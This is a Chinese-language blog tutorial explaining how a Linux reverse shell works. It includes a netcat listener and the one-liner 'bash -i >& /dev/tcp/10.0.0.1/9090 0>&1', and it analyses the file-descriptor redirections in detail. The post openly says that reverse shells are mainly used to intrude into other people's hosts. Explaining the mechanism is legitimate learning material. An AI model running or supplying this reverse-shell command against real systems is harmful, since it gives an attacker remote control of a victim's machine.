這篇文章主要介紹“Linux的反彈shell命令的解析”,在日常操作中,相信很多人在Linux的反彈shell命令的解析問題上存在疑惑,小編查閱了各式資料,整理出簡(jiǎn)單好用的操作方法,希望對(duì)大家解答”Linux的反彈shell命令的解析”的疑惑有所幫助!接下來(lái),請(qǐng)跟著小編一起來(lái)學(xué)習(xí)吧!
專注于為中小企業(yè)提供網(wǎng)站建設(shè)、做網(wǎng)站服務(wù),電腦端+手機(jī)端+微信端的三站合一,更高效的管理,為中小企業(yè)壺關(guān)免費(fèi)做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)。我們立足成都,凝聚了一批互聯(lián)網(wǎng)行業(yè)人才,有力地推動(dòng)了千余家企業(yè)的穩(wěn)健成長(zhǎng),幫助中小企業(yè)通過網(wǎng)站建設(shè)實(shí)現(xiàn)規(guī)模擴(kuò)充和轉(zhuǎn)變。
1. 什么是反彈shell
簡(jiǎn)單來(lái)說(shuō)就是A主機(jī)可以通過執(zhí)行B主機(jī)上的命令并且把返回值都返回到A上。
2. 反彈shell的用途
這個(gè)反彈shell大部分用途是用來(lái)侵入別人的主機(jī)。就是因?yàn)楦杏X很厲害的樣子,所以才來(lái)研究這家伙
3. 反彈shell操作步驟
3.1. 在本機(jī)開啟端口9090
nc -lk 9090
3.2. 在需要被控制的機(jī)器上執(zhí)行如下兩種命令中的一種即可
bash -i >& /dev/tcp/10.0.0.1/9090 0>&1
3.3. 在本機(jī)剛才執(zhí)行nc -lk 9090命令行下面輸入需要被控制的主機(jī)的命令即可
4. 原理
A主機(jī)開啟9090端口的tcp服務(wù)
B主機(jī)連接到A主機(jī)的9090的tcp服務(wù)
A主機(jī)通過tcp服務(wù)把命令發(fā)到B主機(jī)
B主機(jī)讀取命令并且在bash中執(zhí)行
B主機(jī)把執(zhí)行結(jié)果發(fā)給A主機(jī)
這樣就可以在A主機(jī)中'玩弄'B主機(jī)了
下面重點(diǎn)來(lái)了
我們看這個(gè)操作其實(shí)還是蠻簡(jiǎn)單的,但是我們不能只局限于表面。我們需要去了解它的原理
其實(shí)nc -lk 9090命令沒什么可說(shuō)的,百度google一搜就出來(lái)了。我們今天要去解釋的是bash -i >& /dev/tcp/10.0.0.1/9090 0>&1。這條命令在google也沒搜出來(lái)什么結(jié)果。所以只能自己加夜班搞了。
inux shell下常用的文件描述符是:
標(biāo)準(zhǔn)輸入 (stdin) :代碼為 0 ,使用 < 或 << ;
標(biāo)準(zhǔn)輸出 (stdout):代碼為 1 ,使用 > 或 >> ;
標(biāo)準(zhǔn)錯(cuò)誤輸出(stderr):代碼為 2 ,使用 2> 或 2>>。
首先我們把這個(gè)命令拆解一下
bash -i # 這個(gè)也不知道說(shuō)啥 >& # 這條命令 其實(shí)就是把stderr也輸入到 stdout。它相當(dāng)于 `> xxx 2>&1` /dev/tcp/10.0.0.1/9090 # 這個(gè)就是連接到10.0.0.1的9090端口 0>&1 # 這個(gè)在google百度上查了半天也沒搞懂,只能去研究文檔
其實(shí)前面3個(gè)命令組合在一起很好理解,就是把這個(gè)bash下的所有輸出都發(fā)送到 10.0.0.1:9090。這個(gè)大家可以自己操作一下,去掉后面的 0>&1。
我們?cè)诿罾锩鎸? 2>&1都很好理解,就是把error重定向到stdout。但是0>&1好像不太好理解,我們看下文件描述符
這里看到的是2>&1就是把文件描述符2對(duì)應(yīng)的設(shè)備改成了文件描述符1對(duì)應(yīng)的設(shè)備。那么同理 0>&1就是把 0對(duì)應(yīng)的設(shè)備改成的1對(duì)應(yīng)的設(shè)備,那也就是socket。這就表明了 stdin就是從socket中讀取數(shù)據(jù),然后再執(zhí)行命令,把bash的命令行返回內(nèi)容通過stdout發(fā)到socket。
其實(shí)這些內(nèi)容都可以在bash的man pages里面找到
文檔里面寫的很清楚 n<&word 是吧word復(fù)制給n, n>&word是吧word復(fù)制給n。
所以這里寫 0<&1 或者是 0>&1都是可以的,只要把文件描述符1對(duì)應(yīng)的設(shè)備復(fù)制給文件描述符0就可以了
到此,關(guān)于“Linux的反彈shell命令的解析”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí),請(qǐng)繼續(xù)關(guān)注創(chuàng)新互聯(lián)網(wǎng)站,小編會(huì)繼續(xù)努力為大家?guī)?lái)更多實(shí)用的文章!
網(wǎng)站欄目:Linux的反彈shell命令的解析
標(biāo)題鏈接:http://chinadenli.net/article24/ihghce.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供搜索引擎優(yōu)化、標(biāo)簽優(yōu)化、建站公司、網(wǎng)站設(shè)計(jì)公司、手機(jī)網(wǎng)站建設(shè)、品牌網(wǎng)站制作
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)